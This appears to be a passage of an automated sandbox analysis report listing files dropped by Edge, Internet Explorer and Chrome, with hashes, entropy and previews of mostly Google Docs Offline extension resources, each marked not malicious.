                                                                                                                                              Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1263
                                                                                                                                              Entropy (8bit):4.861856182762435
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                              MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                              SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                              SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                              SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1074
                                                                                                                                              Entropy (8bit):5.062722522759407
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                              MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                              SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                              SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                              SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):879
                                                                                                                                              Entropy (8bit):5.7905809868505544
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                              MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                              SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                              SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                              SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1205
                                                                                                                                              Entropy (8bit):4.50367724745418
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                              MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                              SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                              SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                              SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):843
                                                                                                                                              Entropy (8bit):5.76581227215314
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                              MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                              SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                              SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                              SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):912
                                                                                                                                              Entropy (8bit):4.65963951143349
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                              MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                              SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                              SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                              SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):11406
                                                                                                                                              Entropy (8bit):5.745845607168024
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                              MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                              SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                              SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                              SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):854
                                                                                                                                              Entropy (8bit):4.284628987131403
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                              MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                              SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                              SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                              SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:JSON data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2525
                                                                                                                                              Entropy (8bit):5.417954053901
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                              MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                              SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                              SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                              SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):97
                                                                                                                                              Entropy (8bit):4.862433271815736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                              MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                              SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                              SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                              SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with very long lines (4882)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):122218
                                                                                                                                              Entropy (8bit):5.439997574414675
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                              MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                              SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                              SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                              SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):291
                                                                                                                                              Entropy (8bit):4.65176400421739
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                              MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                              SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                              SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                              SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              File Type:ASCII text, with very long lines (4882)
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):130866
                                                                                                                                              Entropy (8bit):5.425065147784983
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                              MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                              SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                              SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                              SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16384
                                                                                                                                              Entropy (8bit):0.10702788083743577
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:Vs16bz6bQsITwdVrW6Xj06sITHtldlRsltFll2/lsll/bW61UXC6fll:VCEG/dW+j0wlql3+tsrWE8CE
                                                                                                                                              MD5:04610E400A1B0BCCEDF09FDBBBBBC4CB
                                                                                                                                              SHA1:D3D64211B79DF2DCA8D9AE6FD421FD17BC7DF92C
                                                                                                                                              SHA-256:574055AE5FB33A8732340EF45820E9F3C96BF27C3723E61AFC54F4A0EAAD61C9
                                                                                                                                              SHA-512:512858613ECE0CCC3A2106768EC0CCE141DABDFA127CEE73DA08175BF7D3E8A4D9135339EF25DB609618976C097C307C784A693B939CA16E7A0996A2894108B3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16384
                                                                                                                                              Entropy (8bit):0.4649697523292065
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:i9lE8OPLIMRyJWGmN6qKOCDK+gRbHKKoD1SMBdhMBlcMCixC:N8ODIMMmN6qsDKfROKoDFBYBlc3i
                                                                                                                                              MD5:FCC8A35793DE3F065A71B5EF84E8A398
                                                                                                                                              SHA1:25C8C80DBEE05A8BC245E4FC17F99A0CA9B49D4B
                                                                                                                                              SHA-256:043A96BC76876800E84B3B63ABFF45643FBE880766E39FAA3F5C8C1F00994519
                                                                                                                                              SHA-512:1026D616B2F565C2D7DFB32915A13D638ABB9A7FBDEB31AF384CCA07942B7A849669EEAC4363C409C0A1BCE23A3B17FD1C319B0A11920720394D27E0ACFC2ED1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16384
                                                                                                                                              Entropy (8bit):0.06917822005332831
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:alFXEAUolllbll1nltllNlFlVlZmllol/Hflly7l8t5tXlRsltFll2/lsllM/llH:a/vllLaluqh8tMl3+tsM6GK+v4W1
                                                                                                                                              MD5:94AB3DE90452521DEFF1DF2C2CA21BC1
                                                                                                                                              SHA1:FFFA3B2CB3B9204CCE04C12AAC71BCC84C37D437
                                                                                                                                              SHA-256:D19D3EF22C0C3FD6FF332A70725E534E2E4E2DB09A427DA85DCAFF78C476170C
                                                                                                                                              SHA-512:39865E7E55D4D96C9671D4F004001B4A79784B2885FA383E1AAA950B7A926FEAC3ADDBD77EA6E86FF39A772F10ABB38DA86A7B72D1FAA334F73F351CD69211BB
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):16384
                                                                                                                                              Entropy (8bit):0.05630632014234242
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:alFXEAUolllHlly+lllX9/Dl/Oly3lgHlXXlRsltFll2/lsllM+lylhllAlFJej1:a/vllrNngFAl3+tsFIBGKj1
                                                                                                                                              MD5:7F221376DC9972CDF7294CA40004BDB7
                                                                                                                                              SHA1:47A4B64BBE616F87F683705A36856DBD11885BD8
                                                                                                                                              SHA-256:8EAD5DC87B28B637202A9AB5DB79052AE527C97282CF0310969D43FA4CA9D143
                                                                                                                                              SHA-512:6620CBEAB1D6C0FCC67FF9814878093848DD5445091568B8256A314993389F71F9EC3200C71FC2893FAEC6E59367A4CE6D593F4DF5608159E77E9959782E859F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Jan 3 15:32:46 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2673
                                                                                                                                              Entropy (8bit):4.000341579730602
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:8hdGTiCnWHGeidAKZdA1FehwiZUklqehNy+3:8KTWKy
                                                                                                                                              MD5:9FD6F1D7E74327651F9A966104B52CDB
                                                                                                                                              SHA1:CF7FFB6C40E55885EDD5A4E5D3A8A9B43D3F8530
                                                                                                                                              SHA-256:03183FB895CE2837E3025172D64E7AF5583E97511E0789ABCD8F2344FDDBBD33
